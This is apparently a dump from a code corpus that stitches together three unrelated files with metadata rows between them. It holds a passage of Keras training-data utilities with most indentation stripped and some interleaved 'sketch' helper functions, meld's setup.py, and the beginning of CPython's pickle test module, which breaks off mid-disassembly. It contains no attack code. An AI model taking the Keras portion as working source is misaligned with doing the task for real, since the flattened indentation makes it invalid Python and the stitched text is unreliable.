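  y = np.zeros((16, 1), dtype="float32")
  adapter_cls = select_data_adapter(x, y)  # expected: TensorLikeDataAdapter
  adapter = adapter_cls(x, y, batch_size=8)
  return adapter.get_dataset()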
def _type_name(x):
"""Generates a description of the type of an object."""
if isinstance(x, dict):
key_types = set(_type_name(key) for key in x.keys())
val_types = set(_type_name(key) for key in x.values())
return "({} containing {} keys and {} values)".format(
type(x), key_types, val_types)
if isinstance(x, (list, tuple)):
types = set(_type_name(val) for val in x)
return "({} containing values of types {})".format(
type(x), types)
return str(type(x))
def _process_tensorlike(inputs):
"""Process tensor-like inputs.
This function:
(1) Converts `Numpy` arrays to `Tensor`s.
(2) Converts `Scipy` sparse matrices to `SparseTensor`s.
  (3) Converts `list`s to `tuple`s (for `tf.data` support).
Args:
inputs: Structure of `Tensor`s, `NumPy` arrays, or tensor-like.
Returns:
Structure of `Tensor`s or tensor-like.
"""
def _convert_numpy_and_scipy(x):
if isinstance(x, np.ndarray):
dtype = None
if issubclass(x.dtype.type, np.floating):
dtype = backend.floatx()
return ops.convert_to_tensor_v2_with_dispatch(x, dtype=dtype)
elif scipy_sparse and scipy_sparse.issparse(x):
return _scipy_sparse_to_sparse_tensor(x)
return x
inputs = nest.map_structure(_convert_numpy_and_scipy, inputs)
return nest.list_to_tuple(inputs)
def is_none_or_empty(inputs):
  # Utility method to check if the input is None or an empty list.
  # A plain Python "not" check would raise an error like the one below if the
  # input were a NumPy array:
# "The truth value of an array with more than one element is ambiguous.
# Use a.any() or a.all()"
return inputs is None or not nest.flatten(inputs)
def broadcast_sample_weight_modes(target_structure, sample_weight_modes):
"""Match sample_weight_modes structure with output structure."""
if target_structure is None or not nest.flatten(target_structure):
return sample_weight_modes
if isinstance(sample_weight_modes, str):
if isinstance(target_structure, dict):
return {key: sample_weight_modes for key in target_structure.keys()}
return [sample_weight_modes for _ in target_structure]
if sample_weight_modes:
try:
nest.assert_same_structure(
training_utils.list_to_tuple(target_structure),
training_utils.list_to_tuple(sample_weight_modes))
except (ValueError, TypeError):
target_str = str(nest.map_structure(lambda _: "...", target_structure))
mode_str = str(nest.map_structure(lambda _: "...", sample_weight_modes))
# Attempt to coerce sample_weight_modes to the target structure. This
# implicitly depends on the fact that Model flattens outputs for its
# internal representation.
try:
sample_weight_modes = nest.pack_sequence_as(
target_structure, nest.flatten(sample_weight_modes))
logging.warning(
"sample_weight modes were coerced from\n {}\n to \n {}"
            .format(mode_str, target_str))
except (ValueError, TypeError):
raise ValueError(
"Unable to match target structure and sample_weight_modes "
"structure:\n {}\n to \n {}".format(target_str, mode_str))
return sample_weight_modes
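# A small hedged sketch of the broadcasting rule above: a single string mode
# fans out across a multi-output target structure. The helper name is an
# assumption and is never called at import time.
def _sketch_broadcast_sample_weight_modes():
  by_dict = broadcast_sample_weight_modes({"a": None, "b": None}, "temporal")
  by_list = broadcast_sample_weight_modes([None, None], "temporal")
  # ({"a": "temporal", "b": "temporal"}, ["temporal", "temporal"])
  return by_dict, by_list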
class DataHandler(object):
"""Handles iterating over epoch-level `tf.data.Iterator` objects."""
def __init__(self,
x,
y=None,
sample_weight=None,
batch_size=None,
steps_per_epoch=None,
initial_epoch=0,
epochs=1,
shuffle=False,
class_weight=None,
max_queue_size=10,
workers=1,
use_multiprocessing=False,
model=None,
steps_per_execution=None,
distribute=True):
"""Initializes a `DataHandler`.
Arguments:
x: See `Model.fit`.
y: See `Model.fit`.
sample_weight: See `Model.fit`.
batch_size: See `Model.fit`.
steps_per_epoch: See `Model.fit`.
initial_epoch: See `Model.fit`.
epochs: See `Model.fit`.
shuffle: See `Model.fit`.
class_weight: See `Model.fit`.
max_queue_size: See `Model.fit`.
workers: See `Model.fit`.
use_multiprocessing: See `Model.fit`.
model: The `Model` instance. Needed in order to correctly `build` the
`Model` using generator-like inputs (see `GeneratorDataAdapter`).
steps_per_execution: See `Model.compile`.
distribute: Whether to distribute the `tf.dataset`.
`PreprocessingLayer.adapt` does not support distributed datasets,
`Model` should always set this to `True`.
"""
self._initial_epoch = initial_epoch
self._epochs = epochs
self._insufficient_data = False
self._model = model
# `steps_per_execution_value` is the cached initial value.
# `steps_per_execution` is mutable and may be changed by the DataAdapter
# to handle partial executions.
if steps_per_execution is None:
self._steps_per_execution = 1
self._steps_per_execution_value = 1
else:
self._steps_per_execution = steps_per_execution
self._steps_per_execution_value = steps_per_execution.numpy().item()
adapter_cls = select_data_adapter(x, y)
self._verify_data_adapter_compatibility(adapter_cls)
self._adapter = adapter_cls(
x,
y,
batch_size=batch_size,
steps=steps_per_epoch,
epochs=epochs - initial_epoch,
sample_weights=sample_weight,
shuffle=shuffle,
max_queue_size=max_queue_size,
workers=workers,
use_multiprocessing=use_multiprocessing,
distribution_strategy=ds_context.get_strategy(),
model=model)
strategy = ds_context.get_strategy()
self._current_step = 0
self._step_increment = self._steps_per_execution_value - 1
self._insufficient_data = False
self._configure_dataset_and_inferred_steps(strategy, x, steps_per_epoch,
class_weight, distribute)
def _verify_data_adapter_compatibility(self, adapter_cls):
pass
def _configure_dataset_and_inferred_steps(self, strategy, x, steps_per_epoch,
class_weight, distribute):
"""Configure the `_dataset` and `_inferred_steps` attributes."""
del x
dataset = self._adapter.get_dataset()
if class_weight:
dataset = dataset.map(_make_class_weight_map_fn(class_weight))
self._inferred_steps = self._infer_steps(steps_per_epoch, dataset)
# `PreprocessingLayer.adapt` does not currently support distributed
# datasets, so we pass `distribute=False` there.
if distribute and not _is_distributed_dataset(dataset):
dataset = strategy.experimental_distribute_dataset(dataset)
self._dataset = dataset
self._validate_data_handler()
def enumerate_epochs(self):
"""Yields `(epoch, tf.data.Iterator)`."""
with self._truncate_execution_to_epoch():
data_iterator = iter(self._dataset)
for epoch in range(self._initial_epoch, self._epochs):
if self._insufficient_data: # Set by `catch_stop_iteration`.
break
if self._adapter.should_recreate_iterator():
data_iterator = iter(self._dataset)
yield epoch, data_iterator
self._adapter.on_epoch_end()
@contextlib.contextmanager
def _truncate_execution_to_epoch(self):
"""Truncates steps per execution to at most one epoch."""
should_truncate = (
self._inferred_steps is not None and
self._steps_per_execution_value > self._inferred_steps)
original_value = self._steps_per_execution_value
try:
if should_truncate:
self._steps_per_execution.assign(self._inferred_steps)
self._steps_per_execution_value = self._inferred_steps
yield
finally:
if should_truncate:
self._steps_per_execution.assign(original_value)
self._steps_per_execution_value = original_value
def sync(self):
context.async_wait()
@contextlib.contextmanager
def catch_stop_iteration(self):
"""Catches errors when an iterator runs out of data."""
try:
yield
self.sync()
except (StopIteration, errors.OutOfRangeError):
if self._inferred_steps is None:
self._inferred_steps = self._current_step
else:
self._insufficient_data = True
total_epochs = self._epochs - self._initial_epoch
logging.warning(
"Your input ran out of data; interrupting training. "
"Make sure that your dataset or generator can generate at "
"least `steps_per_epoch * epochs` batches (in this case, "
"{} batches). You may need to use the repeat() function "
"when building your dataset.".format(total_epochs *
self._inferred_steps))
def steps(self):
"""Yields steps for the current epoch."""
self._current_step = 0
# `self._inferred_steps` can be changed by `catch_stop_iteration`.
while (self._inferred_steps is None or
self._current_step < self._inferred_steps):
if self._insufficient_data: # Set by `catch_stop_iteration`.
break
can_run_full_execution = (
self._steps_per_execution_value == 1 or
self._inferred_steps is None or
self._inferred_steps - self._current_step >=
self._steps_per_execution_value)
if can_run_full_execution:
self._step_increment = self._steps_per_execution_value - 1
yield self._current_step
self._current_step += self._steps_per_execution_value
else:
# Last partial execution.
steps_remaining = self._inferred_steps - self._current_step
self._steps_per_execution.assign(steps_remaining)
self._step_increment = steps_remaining - 1
yield self._current_step
self._current_step += steps_remaining
self._steps_per_execution.assign(self._steps_per_execution_value)
@property
def step_increment(self):
"""The number to increment the step for `on_batch_end` methods."""
return self._step_increment
@property
def inferred_steps(self):
"""The inferred steps per epoch of the created `Dataset`.
This will be `None` in the case where:
(1) A `Dataset` of unknown cardinality was passed to the `DataHandler`, and
(2) `steps_per_epoch` was not provided, and
(3) The first epoch of iteration has not yet completed.
Returns:
The inferred steps per epoch of the created `Dataset`.
"""
return self._inferred_steps
@property
def should_sync(self):
# Catch OutOfRangeError for Datasets of unknown size.
# This blocks until the batch has finished executing.
# TODO(b/150292341): Allow multiple async steps here.
return self._inferred_steps is None
def _infer_steps(self, steps, dataset):
"""Infers steps_per_epoch needed to loop through a dataset."""
if steps is not None:
return steps
adapter_steps = self._adapter.get_size()
if adapter_steps is not None:
return adapter_steps
size = cardinality.cardinality(dataset)
if size == cardinality.INFINITE and steps is None:
raise ValueError("When passing an infinitely repeating dataset, you "
"must specify how many steps to draw.")
if size >= 0:
return size.numpy().item()
return None
@property
def _samples(self):
return self._adapter.get_samples()
def _validate_data_handler(self):
# TODO(b/152094471): Support this with DistIter.get_next_as_optional.
if self._steps_per_execution_value > 1 and self._inferred_steps is None:
raise ValueError(
"Could not infer the size of the data. With "
"`steps_per_execution > 1`, you must specify the number of steps "
"to run.")
def resolve_logs(self, logs):
return logs
class _ClusterCoordinatorDataHandler(DataHandler):
"""A `DataHandler` that is compatible with `ClusterCoordinator`."""
def _verify_data_adapter_compatibility(self, adapter_cls):
if adapter_cls != DatasetCreatorAdapter:
raise NotImplementedError("Only `DatasetCreator` input is supported in "
"`ParameterServerStrategy` at this time.")
def _configure_dataset_and_inferred_steps(self, strategy, x, steps_per_epoch,
class_weight, distribute):
if not isinstance(x, dataset_creator.DatasetCreator):
raise TypeError("When using `ParameterServerStrategy`, `x` must be a "
"`DatasetCreator`.")
def per_worker_dataset_fn():
return strategy.distribute_datasets_from_function(x)
self._dataset = self._model._cluster_coordinator.create_per_worker_dataset( # pylint: disable=protected-access
per_worker_dataset_fn)
if steps_per_epoch is None:
raise ValueError(
"`steps_per_epoch` must be specified with `ParameterServerStrategy`.")
self._inferred_steps = steps_per_epoch
def sync(self):
self._model._cluster_coordinator.join() # pylint: disable=protected-access
def resolve_logs(self, logs):
return logs.fetch()
def get_data_handler(*args, **kwargs):
if getattr(kwargs["model"], "_cluster_coordinator", None):
return _ClusterCoordinatorDataHandler(*args, **kwargs)
return DataHandler(*args, **kwargs)
def _make_class_weight_map_fn(class_weight):
"""Applies class weighting to a `Dataset`.
The `Dataset` is assumed to be in format `(x, y)` or `(x, y, sw)`, where
`y` must be a single `Tensor`.
Args:
class_weight: A map where the keys are integer class ids and values are
the class weights, e.g. `{0: 0.2, 1: 0.6, 2: 0.3}`
Returns:
A function that can be used with `tf.data.Dataset.map` to apply class
weighting.
"""
class_ids = list(sorted(class_weight.keys()))
expected_class_ids = list(range(len(class_ids)))
if class_ids != expected_class_ids:
error_msg = (
"Expected `class_weight` to be a dict with keys from 0 to one less "
"than the number of classes, found {}").format(class_weight)
raise ValueError(error_msg)
class_weight_tensor = ops.convert_to_tensor_v2_with_dispatch(
[class_weight[int(c)] for c in class_ids])
def _class_weights_map_fn(*data):
"""Convert `class_weight` to `sample_weight`."""
x, y, sw = unpack_x_y_sample_weight(data)
if nest.is_nested(y):
raise ValueError(
"`class_weight` is only supported for Models with a single output.")
if y.shape.rank > 2:
raise ValueError("`class_weight` not supported for "
"3+ dimensional targets.")
y_classes = smart_cond.smart_cond(
y.shape.rank == 2 and backend.shape(y)[1] > 1,
lambda: backend.argmax(y, axis=1),
lambda: math_ops.cast(backend.reshape(y, (-1,)), dtypes.int64))
cw = array_ops.gather_v2(class_weight_tensor, y_classes)
if sw is not None:
cw = math_ops.cast(cw, sw.dtype)
sw, cw = expand_1d((sw, cw))
# `class_weight` and `sample_weight` are multiplicative.
sw = sw * cw
else:
sw = cw
return x, y, sw
return _class_weights_map_fn
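# A hedged sketch of applying the class-weight map to an in-memory batch. It uses
# only APIs already referenced elsewhere in this file; the helper name is an
# assumption and nothing runs at import time.
def _sketch_class_weight_map():
  x = np.zeros((4, 3), dtype="float32")
  y = np.array([[0], [1], [1], [0]], dtype="int64")
  ds = dataset_ops.DatasetV2.from_tensors((x, y))  # a single batch of 4 samples
  ds = ds.map(_make_class_weight_map_fn({0: 1.0, 1: 2.0}))
  return ds  # elements are now (x, y, sample_weight)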
def expand_1d(data):
"""Expands 1-dimensional `Tensor`s into 2-dimensional `Tensor`s."""
def _expand_single_1d_tensor(t):
# Leaves `CompositeTensor`s as-is.
if (isinstance(t, ops.Tensor) and
isinstance(t.shape, tensor_shape.TensorShape) and t.shape.rank == 1):
return array_ops.expand_dims_v2(t, axis=-1)
return t
return nest.map_structure(_expand_single_1d_tensor, data)
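# Hedged sketch: only rank-1 dense tensors gain a trailing axis; rank-2+ and
# composite tensors pass through unchanged. Helper name is an assumption.
def _sketch_expand_1d():
  t = ops.convert_to_tensor_v2_with_dispatch([1.0, 2.0, 3.0])  # shape (3,)
  return expand_1d(t)  # shape (3, 1)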
def train_validation_split(arrays, validation_split):
"""Split arrays into train and validation subsets in deterministic order.
The last part of data will become validation data.
Args:
arrays: Tensors to split. Allowed inputs are arbitrarily nested structures
of Tensors and NumPy arrays.
validation_split: Float between 0 and 1. The proportion of the dataset to
include in the validation split. The rest of the dataset will be included
in the training split.
Returns:
`(train_arrays, validation_arrays)`
"""
def _can_split(t):
tensor_types = (ops.Tensor, np.ndarray)
if pd:
tensor_types = (ops.Tensor, np.ndarray, pd.Series, pd.DataFrame)
return isinstance(t, tensor_types) or t is None
flat_arrays = nest.flatten(arrays)
unsplitable = [type(t) for t in flat_arrays if not _can_split(t)]
if unsplitable:
raise ValueError(
"`validation_split` is only supported for Tensors or NumPy "
"arrays, found following types in the input: {}".format(unsplitable))
if all(t is None for t in flat_arrays):
return arrays, arrays
first_non_none = None
for t in flat_arrays:
if t is not None:
first_non_none = t
break
# Assumes all arrays have the same batch shape or are `None`.
batch_dim = int(first_non_none.shape[0])
split_at = int(math.floor(batch_dim * (1. - validation_split)))
if split_at == 0 or split_at == batch_dim:
raise ValueError(
"Training data contains {batch_dim} samples, which is not sufficient "
"to split it into a validation and training set as specified by "
"`validation_split={validation_split}`. Either provide more data, or a "
"different value for the `validation_split` argument." .format(
batch_dim=batch_dim, validation_split=validation_split))
def _split(t, start, end):
if t is None:
return t
return t[start:end]
train_arrays = nest.map_structure(
functools.partial(_split, start=0, end=split_at), arrays)
val_arrays = nest.map_structure(
functools.partial(_split, start=split_at, end=batch_dim), arrays)
return train_arrays, val_arrays
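# Hedged sketch of the deterministic tail split documented above; the helper is
# an assumption and is never called at import time.
def _sketch_train_validation_split():
  x = np.arange(10).reshape(10, 1)
  y = np.arange(10)
  (x_tr, y_tr), (x_val, y_val) = train_validation_split(
      (x, y), validation_split=0.2)
  return x_tr.shape[0], x_val.shape[0]  # (8, 2): validation always takes the tail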
@keras_export("keras.utils.unpack_x_y_sample_weight", v1=[])
def unpack_x_y_sample_weight(data):
"""Unpacks user-provided data tuple.
This is a convenience utility to be used when overriding
`Model.train_step`, `Model.test_step`, or `Model.predict_step`.
This utility makes it easy to support data of the form `(x,)`,
`(x, y)`, or `(x, y, sample_weight)`.
Standalone usage:
>>> features_batch = tf.ones((10, 5))
>>> labels_batch = tf.zeros((10, 5))
>>> data = (features_batch, labels_batch)
>>> # `y` and `sample_weight` will default to `None` if not provided.
>>> x, y, sample_weight = tf.keras.utils.unpack_x_y_sample_weight(data)
>>> sample_weight is None
True
Example in overridden `Model.train_step`:
```python
class MyModel(tf.keras.Model):
def train_step(self, data):
# If `sample_weight` is not provided, all samples will be weighted
# equally.
x, y, sample_weight = tf.keras.utils.unpack_x_y_sample_weight(data)
with tf.GradientTape() as tape:
y_pred = self(x, training=True)
loss = self.compiled_loss(
y, y_pred, sample_weight, regularization_losses=self.losses)
trainable_variables = self.trainable_variables
gradients = tape.gradient(loss, trainable_variables)
self.optimizer.apply_gradients(zip(gradients, trainable_variables))
self.compiled_metrics.update_state(y, y_pred, sample_weight)
return {m.name: m.result() for m in self.metrics}
```
Args:
data: A tuple of the form `(x,)`, `(x, y)`, or `(x, y, sample_weight)`.
Returns:
The unpacked tuple, with `None`s for `y` and `sample_weight` if they are not
provided.
"""
if not isinstance(data, tuple):
return (data, None, None)
elif len(data) == 1:
return (data[0], None, None)
elif len(data) == 2:
return (data[0], data[1], None)
elif len(data) == 3:
return (data[0], data[1], data[2])
else:
error_msg = ("Data is expected to be in format `x`, `(x,)`, `(x, y)`, "
"or `(x, y, sample_weight)`, found: {}").format(data)
raise ValueError(error_msg)
@keras_export("keras.utils.pack_x_y_sample_weight", v1=[])
def pack_x_y_sample_weight(x, y=None, sample_weight=None):
"""Packs user-provided data into a tuple.
This is a convenience utility for packing data into the tuple formats
that `Model.fit` uses.
Standalone usage:
>>> x = tf.ones((10, 1))
>>> data = tf.keras.utils.pack_x_y_sample_weight(x)
>>> isinstance(data, tf.Tensor)
True
>>> y = tf.ones((10, 1))
>>> data = tf.keras.utils.pack_x_y_sample_weight(x, y)
>>> isinstance(data, tuple)
True
>>> x, y = data
Args:
x: Features to pass to `Model`.
y: Ground-truth targets to pass to `Model`.
sample_weight: Sample weight for each element.
Returns:
Tuple in the format used in `Model.fit`.
"""
if y is None:
# For single x-input, we do no tuple wrapping since in this case
# there is no ambiguity. This also makes NumPy and Dataset
# consistent in that the user does not have to wrap their Dataset
    # data in an unnecessary tuple.
if not nest.is_nested(x):
return x
else:
return (x,)
elif sample_weight is None:
return (x, y)
else:
return (x, y, sample_weight)
def single_batch_iterator(strategy,
x,
y=None,
sample_weight=None,
class_weight=None):
"""Creates a single-batch dataset."""
x, y, sample_weight = _process_tensorlike((x, y, sample_weight))
if y is None:
data = (x,)
elif sample_weight is None:
data = (x, y)
else:
data = (x, y, sample_weight)
_check_data_cardinality(data)
dataset = dataset_ops.DatasetV2.from_tensors(data)
if class_weight:
dataset = dataset.map(_make_class_weight_map_fn(class_weight))
dataset = strategy.experimental_distribute_dataset(dataset)
return iter(dataset)
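# Hedged sketch: `single_batch_iterator` is the one-shot counterpart of
# DataHandler for a batch that is already materialized in memory. The helper
# name is an assumption and nothing runs at import time.
def _sketch_single_batch_iterator():
  strategy = ds_context.get_strategy()
  it = single_batch_iterator(strategy,
                             np.ones((4, 2), dtype="float32"),
                             np.zeros((4, 1), dtype="float32"))
  return next(it)  # a single distributed (x, y) batch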
def _check_data_cardinality(data):
num_samples = set(int(i.shape[0]) for i in nest.flatten(data))
if len(num_samples) > 1:
msg = "Data cardinality is ambiguous:\n"
for label, single_data in zip(["x", "y", "sample_weight"], data):
msg += " {} sizes: {}\n".format(
label, ", ".join(str(i.shape[0]) for i in nest.flatten(single_data)))
msg += "Make sure all arrays contain the same number of samples."
raise ValueError(msg)
def _scipy_sparse_to_sparse_tensor(t):
"""Converts a SciPy sparse matrix to a SparseTensor."""
sparse_coo = t.tocoo()
row, col = sparse_coo.row, sparse_coo.col
data, shape = sparse_coo.data, sparse_coo.shape
if issubclass(data.dtype.type, np.floating):
data = data.astype(backend.floatx())
indices = np.concatenate(
(np.expand_dims(row, axis=1), np.expand_dims(col, axis=1)), axis=1)
return sparse_tensor.SparseTensor(indices, data, shape)
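# Hedged sketch (requires SciPy, which this module treats as an optional
# dependency); the helper name is an assumption and nothing runs at import time.
def _sketch_scipy_sparse_conversion():
  from scipy import sparse
  mat = sparse.coo_matrix(([1.0, 2.0], ([0, 1], [1, 0])), shape=(2, 2))
  return _scipy_sparse_to_sparse_tensor(mat)  # 2x2 SparseTensor, values [1., 2.]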
def _is_distributed_dataset(ds):
return isinstance(ds, input_lib.DistributedDatasetInterface)
| apache-2.0 | -7,670,201,060,302,608,000 | 33.778044 | 115 | 0.658404 | false |
aularon/meld | setup.py | 1 | 2104 | #!/usr/bin/env python
from distutils.core import setup
import glob
import platform
import sys
import meld.build_helpers
import meld.conf
if (platform.system() == 'Linux' and
platform.linux_distribution()[0] == 'Ubuntu'):
sys.argv.append('--install-layout=deb')
setup(
name=meld.conf.__package__,
version=meld.conf.__version__,
description='Visual diff and merge tool',
author='Kai Willadsen',
author_email='[email protected]',
url='http://meldmerge.org',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: X11 Applications :: GTK',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: GNU General Public License v2 or later (GPLv2+)',
'Programming Language :: Python',
'Topic :: Desktop Environment :: Gnome',
'Topic :: Software Development',
'Topic :: Software Development :: Version Control',
],
packages=[
'meld',
'meld.ui',
'meld.util',
'meld.vc',
],
package_data={
'meld': ['README', 'COPYING', 'NEWS'],
'meld.vc': ['README', 'COPYING'],
},
scripts=['bin/meld'],
data_files=[
('share/man/man1',
['meld.1']
),
('share/doc/meld-' + meld.conf.__version__,
['COPYING', 'NEWS']
),
('share/meld',
['data/meld.css']
),
('share/meld/icons',
glob.glob("data/icons/*.png") +
glob.glob("data/icons/COPYING*")
),
('share/meld/ui',
glob.glob("data/ui/*.ui") + glob.glob("data/ui/*.xml")
),
],
cmdclass={
"build_i18n": meld.build_helpers.build_i18n,
"build_help": meld.build_helpers.build_help,
"build_icons": meld.build_helpers.build_icons,
"build_data": meld.build_helpers.build_data,
"build_py": meld.build_helpers.build_py,
"install_data": meld.build_helpers.install_data,
},
distclass=meld.build_helpers.MeldDistribution,
)
| gpl-2.0 | -8,133,816,327,684,232,000 | 28.222222 | 85 | 0.564639 | false |
mancoast/CPythonPyc_test | fail/312_pickletester.py | 1 | 42506 | import io
import unittest
import pickle
import pickletools
import copyreg
from http.cookies import SimpleCookie
from test.support import TestFailed, TESTFN, run_with_locale
from pickle import bytes_types
# Tests that try a number of pickle protocols should have a
# for proto in protocols:
# kind of outer loop.
protocols = range(pickle.HIGHEST_PROTOCOL + 1)
# Return True if opcode code appears in the pickle, else False.
def opcode_in_pickle(code, pickle):
for op, dummy, dummy in pickletools.genops(pickle):
if op.code == code.decode("latin-1"):
return True
return False
# Return the number of times opcode code appears in pickle.
def count_opcode(code, pickle):
n = 0
for op, dummy, dummy in pickletools.genops(pickle):
if op.code == code.decode("latin-1"):
n += 1
return n
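# Illustrative sketch (hedged; wrapped in a helper so nothing executes at import
# time): both helpers above scan a pickle byte stream via pickletools.genops.
def _sketch_opcode_helpers():
    empty_list_p2 = pickle.dumps([], 2)
    small_list_p2 = pickle.dumps([1, 2, 3], 2)
    return (opcode_in_pickle(pickle.EMPTY_LIST, empty_list_p2),  # True
            count_opcode(pickle.BININT1, small_list_p2))         # 3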
# We can't very well test the extension registry without putting known stuff
# in it, but we have to be careful to restore its original state. Code
# should do this:
#
# e = ExtensionSaver(extension_code)
# try:
# fiddle w/ the extension registry's stuff for extension_code
# finally:
# e.restore()
class ExtensionSaver:
# Remember current registration for code (if any), and remove it (if
# there is one).
def __init__(self, code):
self.code = code
if code in copyreg._inverted_registry:
self.pair = copyreg._inverted_registry[code]
copyreg.remove_extension(self.pair[0], self.pair[1], code)
else:
self.pair = None
# Restore previous registration for code.
def restore(self):
code = self.code
curpair = copyreg._inverted_registry.get(code)
if curpair is not None:
copyreg.remove_extension(curpair[0], curpair[1], code)
pair = self.pair
if pair is not None:
copyreg.add_extension(pair[0], pair[1], code)
class C:
def __eq__(self, other):
return self.__dict__ == other.__dict__
import __main__
__main__.C = C
C.__module__ = "__main__"
class myint(int):
def __init__(self, x):
self.str = str(x)
class initarg(C):
def __init__(self, a, b):
self.a = a
self.b = b
def __getinitargs__(self):
return self.a, self.b
class metaclass(type):
pass
class use_metaclass(object, metaclass=metaclass):
pass
# DATA0 .. DATA2 are the pickles we expect under the various protocols, for
# the object returned by create_data().
DATA0 = (
b'(lp0\nL0L\naL1L\naF2.0\nac'
b'builtins\ncomplex\n'
b'p1\n(F3.0\nF0.0\ntp2\nRp'
b'3\naL1L\naL-1L\naL255L\naL-'
b'255L\naL-256L\naL65535L\na'
b'L-65535L\naL-65536L\naL2'
b'147483647L\naL-2147483'
b'647L\naL-2147483648L\na('
b'Vabc\np4\ng4\nccopyreg'
b'\n_reconstructor\np5\n('
b'c__main__\nC\np6\ncbu'
b'iltins\nobject\np7\nNt'
b'p8\nRp9\n(dp10\nVfoo\np1'
b'1\nL1L\nsVbar\np12\nL2L\nsb'
b'g9\ntp13\nag13\naL5L\na.'
)
# Disassembly of DATA0
DATA0_DIS = """\
0: ( MARK
1: l LIST (MARK at 0)
2: p PUT 0
5: L LONG 0
9: a APPEND
10: L LONG 1
14: a APPEND
15: F FLOAT 2.0
20: a APPEND
21: c GLOBAL 'builtins complex'
39: p PUT 1
42: ( MARK
43: F FLOAT 3.0
48: F FLOAT 0.0
53: t TUPLE (MARK at 42)
54: p PUT 2
57: R REDUCE
58: p PUT 3
61: a APPEND
62: L LONG 1
66: a APPEND
67: L LONG -1
72: a APPEND
73: L LONG 255
79: a APPEND
80: L LONG -255
87: a APPEND
88: L LONG -256
95: a APPEND
96: L LONG 65535
104: a APPEND
105: L LONG -65535
114: a APPEND
115: L LONG -65536
124: a APPEND
125: L LONG 2147483647
138: a APPEND
139: L LONG -2147483647
153: a APPEND
154: L LONG -2147483648
168: a APPEND
169: ( MARK
170: V UNICODE 'abc'
175: p PUT 4
178: g GET 4
181: c GLOBAL 'copyreg _reconstructor'
205: p PUT 5
208: ( MARK
209: c GLOBAL '__main__ C'
221: p PUT 6
224: c GLOBAL 'builtins object'
241: p PUT 7
244: N NONE
245: t TUPLE (MARK at 208)
246: p PUT 8
249: R REDUCE
250: p PUT 9
253: ( MARK
254: d DICT (MARK at 253)
255: p PUT 10
259: V UNICODE 'foo'
264: p PUT 11
268: L LONG 1
272: s SETITEM
273: V UNICODE 'bar'
278: p PUT 12
282: L LONG 2
286: s SETITEM
287: b BUILD
288: g GET 9
291: t TUPLE (MARK at 169)
292: p PUT 13
296: a APPEND
297: g GET 13
301: a APPEND
302: L LONG 5
306: a APPEND
307: . STOP
highest protocol among opcodes = 0
"""
DATA1 = (
b']q\x00(K\x00K\x01G@\x00\x00\x00\x00\x00\x00\x00c'
b'builtins\ncomplex\nq\x01'
b'(G@\x08\x00\x00\x00\x00\x00\x00G\x00\x00\x00\x00\x00\x00\x00\x00t'
b'q\x02Rq\x03K\x01J\xff\xff\xff\xffK\xffJ\x01\xff\xff\xffJ'
b'\x00\xff\xff\xffM\xff\xffJ\x01\x00\xff\xffJ\x00\x00\xff\xffJ\xff\xff'
b'\xff\x7fJ\x01\x00\x00\x80J\x00\x00\x00\x80(X\x03\x00\x00\x00ab'
b'cq\x04h\x04ccopyreg\n_reco'
b'nstructor\nq\x05(c__main'
b'__\nC\nq\x06cbuiltins\n'
b'object\nq\x07Ntq\x08Rq\t}q\n('
b'X\x03\x00\x00\x00fooq\x0bK\x01X\x03\x00\x00\x00bar'
b'q\x0cK\x02ubh\ttq\rh\rK\x05e.'
)
# Disassembly of DATA1
DATA1_DIS = """\
0: ] EMPTY_LIST
1: q BINPUT 0
3: ( MARK
4: K BININT1 0
6: K BININT1 1
8: G BINFLOAT 2.0
17: c GLOBAL 'builtins complex'
35: q BINPUT 1
37: ( MARK
38: G BINFLOAT 3.0
47: G BINFLOAT 0.0
56: t TUPLE (MARK at 37)
57: q BINPUT 2
59: R REDUCE
60: q BINPUT 3
62: K BININT1 1
64: J BININT -1
69: K BININT1 255
71: J BININT -255
76: J BININT -256
81: M BININT2 65535
84: J BININT -65535
89: J BININT -65536
94: J BININT 2147483647
99: J BININT -2147483647
104: J BININT -2147483648
109: ( MARK
110: X BINUNICODE 'abc'
118: q BINPUT 4
120: h BINGET 4
122: c GLOBAL 'copyreg _reconstructor'
146: q BINPUT 5
148: ( MARK
149: c GLOBAL '__main__ C'
161: q BINPUT 6
163: c GLOBAL 'builtins object'
180: q BINPUT 7
182: N NONE
183: t TUPLE (MARK at 148)
184: q BINPUT 8
186: R REDUCE
187: q BINPUT 9
189: } EMPTY_DICT
190: q BINPUT 10
192: ( MARK
193: X BINUNICODE 'foo'
201: q BINPUT 11
203: K BININT1 1
205: X BINUNICODE 'bar'
213: q BINPUT 12
215: K BININT1 2
217: u SETITEMS (MARK at 192)
218: b BUILD
219: h BINGET 9
221: t TUPLE (MARK at 109)
222: q BINPUT 13
224: h BINGET 13
226: K BININT1 5
228: e APPENDS (MARK at 3)
229: . STOP
highest protocol among opcodes = 1
"""
DATA2 = (
b'\x80\x02]q\x00(K\x00K\x01G@\x00\x00\x00\x00\x00\x00\x00c'
b'builtins\ncomplex\n'
b'q\x01G@\x08\x00\x00\x00\x00\x00\x00G\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x86q\x02Rq\x03K\x01J\xff\xff\xff\xffK\xffJ\x01\xff\xff\xff'
b'J\x00\xff\xff\xffM\xff\xffJ\x01\x00\xff\xffJ\x00\x00\xff\xffJ\xff'
b'\xff\xff\x7fJ\x01\x00\x00\x80J\x00\x00\x00\x80(X\x03\x00\x00\x00a'
b'bcq\x04h\x04c__main__\nC\nq\x05'
b')\x81q\x06}q\x07(X\x03\x00\x00\x00fooq\x08K\x01'
b'X\x03\x00\x00\x00barq\tK\x02ubh\x06tq\nh'
b'\nK\x05e.'
)
# Disassembly of DATA2
DATA2_DIS = """\
0: \x80 PROTO 2
2: ] EMPTY_LIST
3: q BINPUT 0
5: ( MARK
6: K BININT1 0
8: K BININT1 1
10: G BINFLOAT 2.0
19: c GLOBAL 'builtins complex'
37: q BINPUT 1
39: G BINFLOAT 3.0
48: G BINFLOAT 0.0
57: \x86 TUPLE2
58: q BINPUT 2
60: R REDUCE
61: q BINPUT 3
63: K BININT1 1
65: J BININT -1
70: K BININT1 255
72: J BININT -255
77: J BININT -256
82: M BININT2 65535
85: J BININT -65535
90: J BININT -65536
95: J BININT 2147483647
100: J BININT -2147483647
105: J BININT -2147483648
110: ( MARK
111: X BINUNICODE 'abc'
119: q BINPUT 4
121: h BINGET 4
123: c GLOBAL '__main__ C'
135: q BINPUT 5
137: ) EMPTY_TUPLE
138: \x81 NEWOBJ
139: q BINPUT 6
141: } EMPTY_DICT
142: q BINPUT 7
